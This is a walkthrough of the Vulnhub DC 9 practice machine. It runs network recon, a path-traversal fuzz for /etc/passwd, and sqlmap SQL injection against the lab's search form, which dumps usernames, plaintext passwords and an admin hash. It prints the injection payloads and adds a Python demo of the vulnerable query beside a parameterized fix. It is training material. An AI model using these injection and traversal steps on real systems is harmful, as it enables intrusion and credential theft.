
Vulnhub DC 9 target machine: detailed testing walkthrough

Posted: 2023-02-15 09:11:32

DC 9

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24

Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:b8:5d:8d      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.190  08:00:27:bd:a1:5e      1      60  PCS Systemtechnik GmbH 

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.190.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.190 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 00:42 EST
Nmap scan report for localhost (192.168.56.190)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:BD:A1:5E (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.54 seconds

The Nmap scan shows that the target host has one open port: 80 (http). SSH is reported as filtered; could port knocking be in use?

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ curl http://192.168.56.190/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.190 Port 80</address>
</body></html>

The page has a link to a user login page.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nikto -h http://192.168.56.190
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.190
+ Target Hostname:    192.168.56.190
+ Target Port:        80
+ Start Time:         2023-02-14 00:46:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-02-14 00:47:39 (GMT-5) (60 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

Visiting welcome.php directly returns: logged in as admin? Strange, but even as admin there is no real functionality, and clicking the manage button shows: File does not exist.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ gobuster dir -u http://192.168.56.190 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.190
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2023/02/14 00:48:37 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/search.php           (Status: 200) [Size: 1091]
/index.php            (Status: 200) [Size: 917]
/welcome.php          (Status: 302) [Size: 0] [--> manage.php]
/results.php          (Status: 200) [Size: 1056]
/display.php          (Status: 200) [Size: 2961]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.190/css/]
/includes             (Status: 301) [Size: 319] [--> http://192.168.56.190/includes/]
/logout.php           (Status: 302) [Size: 0] [--> manage.php]
/config.php           (Status: 200) [Size: 0]
/manage.php           (Status:   200) [Size: 1210]
/session.php          (Status: 302) [Size: 0] [--> manage.php]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101513 / 1102805 (99.88%)
===============================================================
2023/02/14 00:52:54 Finished
===============================================================


Could manage.php have a local file inclusion vulnerability?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ wfuzz -c -u http://192.168.56.190/manage.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 87
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.190/manage.php?FUZZ=../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                     
=====================================================================


Total time: 0
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 0

The fuzzing found nothing; another entry point is needed.

After some simple testing, the search.php page turns out to have a SQL injection vulnerability.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5                   
        ___
       __H__                                                                                                                 
 ___ ___[)]_____ ___ ___  {1.6.7#stable}                                                                                     
|_ -| . [']     | .'| . |                                                                                                    
|___|_  [(]_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:05:07 /2023-02-14/

[01:05:08] [INFO] testing connection to the target URL
[01:05:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[01:05:08] [INFO] testing if the target URL content is stable
[01:05:08] [INFO] target URL content is stable
[01:05:08] [INFO] testing if POST parameter 'search' is dynamic
[01:05:08] [INFO] POST parameter 'search' appears to be dynamic
[01:05:08] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[01:05:08] [INFO] testing for SQL injection on POST parameter 'search'
[01:05:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:05:09] [INFO] POST parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Moe")
[01:05:09] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (1) value? [Y/n] y
[01:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[01:05:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[01:05:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[01:05:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[01:05:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[01:05:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[01:05:16] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[01:05:16] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[01:05:16] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[01:05:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[01:05:16] [INFO] testing 'Generic inline queries'
[01:05:16] [INFO] testing 'MySQL inline queries'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[01:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[01:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:05:27] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[01:05:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:05:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:05:27] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:05:27] [INFO] target URL appears to have 6 columns in query
[01:05:27] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 4078=4078-- mhvF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:05:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:05:32] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:05:32] [WARNING] your sqlmap version is outdated

[*] ending @ 01:05:32 /2023-02-14/
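As an added illustration (not code from the original post; the source of DC 9's results.php is not shown, so the query shape and the StaffDetails rows below are constructed, with only the name "Mary Moe" taken from the page), this Python snippet reproduces the string-concatenation pattern that makes the boolean and UNION payloads above work, next to the parameterized form that neutralizes them:

```python
import sqlite3

# Constructed sample data standing in for the DC 9 staff table the search
# feature queries. Only "Mary Moe" comes from the page (sqlmap reported
# --string="Moe" on the search for "mary"); everything else is made up.
SCHEMA = """
CREATE TABLE StaffDetails (
    id INTEGER, firstname TEXT, lastname TEXT,
    position TEXT, phone TEXT, email TEXT
);
INSERT INTO StaffDetails VALUES
  (1, 'Mary',  'Moe',        'Manager', '000-0001', 'mary@example.com'),
  (2, 'Julie', 'Dooley',     'Sales',   '000-0002', 'julie@example.com'),
  (3, 'Fred',  'Flintstone', 'IT',      '000-0003', 'fred@example.com');
"""

# Payloads quoted from the sqlmap run above. The UNION marker is a plain
# string here because SQLite has no CONCAT() or 0x hex literals.
BOOL_TRUE = "mary' AND 4078=4078-- mhvF"
BOOL_FALSE = "mary' AND 4078=4079-- mhvF"
UNION_6 = "mary' UNION ALL SELECT NULL,NULL,NULL,NULL,'qbkpq-marker-qqxvq',NULL-- -"


def connect():
    """In-memory database seeded with the constructed staff rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    """Assumed shape of results.php: user input pasted into the SQL text.

    A quote in `term` closes the string literal, so the rest of the input
    is parsed as SQL (a boolean test, or a UNION with the query's 6 columns)
    and the trailing `--` comments out the remainder of the original query.
    """
    sql = (
        "SELECT * FROM StaffDetails "
        f"WHERE firstname LIKE '%{term}%' OR lastname LIKE '%{term}%'"
    )
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened form: the value is a bound parameter, never part of the SQL.

    The same payloads become odd-looking name fragments and match nothing.
    """
    sql = "SELECT * FROM StaffDetails WHERE firstname LIKE ? OR lastname LIKE ?"
    pattern = f"%{term}%"
    return conn.execute(sql, (pattern, pattern)).fetchall()


if __name__ == "__main__":
    db = connect()
    for label, term in [("plain", "mary"), ("bool-true", BOOL_TRUE),
                        ("bool-false", BOOL_FALSE), ("union", UNION_6)]:
        print(f"{label:10} vulnerable={len(search_vulnerable(db, term))} "
              f"safe={len(search_safe(db, term))}")
```

With the concatenated query, the true/false payloads return one row and none respectively and the UNION payload appends a row carrying the marker; the parameterized query returns rows only for the plain search.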

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 --dbs
[*] starting @ 01:05:37 /2023-02-14/

[01:05:37] [INFO] resuming back-end DBMS 'mysql' 
[01:05:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 4078=4078-- mhvF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:05:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:05:37] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[01:05:37] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:05:37] [WARNING] your sqlmap version is outdated

[*] ending @ 01:05:37 /2023-02-14/

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D users --tables
[*] starting @ 01:05:52 /2023-02-14/

[01:05:52] [INFO] resuming back-end DBMS 'mysql' 
[01:05:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 4078=4078-- mhvF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:05:52] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

[01:05:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:05:52] [WARNING] your sqlmap version is outdated

[*] ending @ 01:05:52 /2023-02-14/

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D users -T UserDetails --columns
[*] starting @ 01:06:04 /2023-02-14/

[01:06:04] [INFO] resuming back-end DBMS 'mysql' 
[01:06:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 4078=4078-- mhvF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:06:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:06:04] [INFO] fetching columns for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column    | Type            |
+-----------+-----------------+
| firstname | varchar(30)     |
| id        | int(6) unsigned |
| lastname  | varchar(30)     |
| password  | varchar(20)     |
| reg_date  | timestamp       |
| username  | varchar(30)     |
+-----------+-----------------+

[01:06:04] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:06:04] [WARNING] your sqlmap version is outdated

[*] ending @ 01:06:04 /2023-02-14/

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D users -T UserDetails -C username,password --dump
[*] starting @ 01:06:19 /2023-02-14/

[01:06:19] [INFO] resuming back-end DBMS 'mysql' 
[01:06:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 4078=4078-- mhvF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:06:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:06:19] [INFO] fetching entries of column(s) 'password,username' for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+-----------+---------------+
| username  | password      |
+-----------+---------------+
| marym     | 3kfs86sfd     |
| julied    | 468sfdfsd2    |
| fredf     | 4sfd87sfd1    |
| barneyr   | RocksOff      |
| tomc      | TC&TheBoyz    |
| jerrym    | B8m#48sd      |
| wilmaf    | Pebbles       |
| bettyr    | BamBam01      |
| chandlerb | UrAG0D!       |
| joeyt     | Passw0rd      |
| rachelg   | yN72#dsd      |
| rossg     | ILoveRachel   |
| monicag   | 3248dsds7s    |
| phoebeb   | smellycats    |
| scoots    | YR3BVxxxw87   |
| janitor   | Ilovepeepee   |
| janitor2  | Hawaii-Five-0 |
+-----------+---------------+

[01:06:20] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.190/dump/users/UserDetails.csv'                                                                                                          
[01:06:20] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:06:20] [WARNING] your sqlmap version is outdated

[*] ending @ 01:06:20 /2023-02-14/

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ ssh [email protected]         
ssh: connect to host 192.168.56.190 port 22: Connection refused
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D Staff --tables                            
[*] starting @ 01:07:47 /2023-02-14/

[01:07:47] [INFO] resuming back-end DBMS 'mysql' 
[01:07:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 4078=4078-- mhvF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:07:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:07:48] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

[01:07:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:07:48] [WARNING] your sqlmap version is outdated

[*] ending @ 01:07:48 /2023-02-14/

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D Staff -T Users --columns
[*] starting @ 01:08:05 /2023-02-14/

[01:08:05] [INFO] resuming back-end DBMS 'mysql' 
[01:08:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 4078=4078-- mhvF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:08:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:08:05] [INFO] fetching columns for table 'Users' in database 'Staff'
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+

[01:08:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:08:05] [WARNING] your sqlmap version is outdated

[*] ending @ 01:08:05 /2023-02-14/

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D Staff -T Users -C Username,Password --dump
[*] starting @ 01:08:18 /2023-02-14/

[01:08:18] [INFO] resuming back-end DBMS 'mysql' 
[01:08:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 4078=4078-- mhvF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:08:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:08:18] [INFO] fetching entries of column(s) 'Password,Username' for table 'Users' in database 'Staff'
[01:08:18] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[01:08:25] [INFO] writing hashes to a temporary file '/tmp/sqlmapyhdt9org9077/sqlmaphashes-qbs4x9tc.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[01:08:28] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[01:08:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[01:08:40] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[01:08:40] [INFO] starting 2 processes 
[01:09:05] [INFO] current status: stans... \^C
[01:09:05] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
[01:09:05] [WARNING] no clear password(s) found                                                                             
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

[01:09:05] [INFO] table 'Staff.Users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.190/dump/Staff/Users.csv'                                                                                                                      
[01:09:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:09:05] [WARNING] your sqlmap version is outdated

[*] ending @ 01:09:05 /2023-02-14/

                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D Staff -T Users -C Username,Password --dump
        ___
       __H__                                                                                                                 
 ___ ___[.]_____ ___ ___  {1.6.7#stable}                                                                                     
|_ -| . [)]     | .'| . |                                                                                                    
|___|_  [.]_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:09:16 /2023-02-14/

[01:09:16] [INFO] resuming back-end DBMS 'mysql' 
[01:09:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 4078=4078-- mhvF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
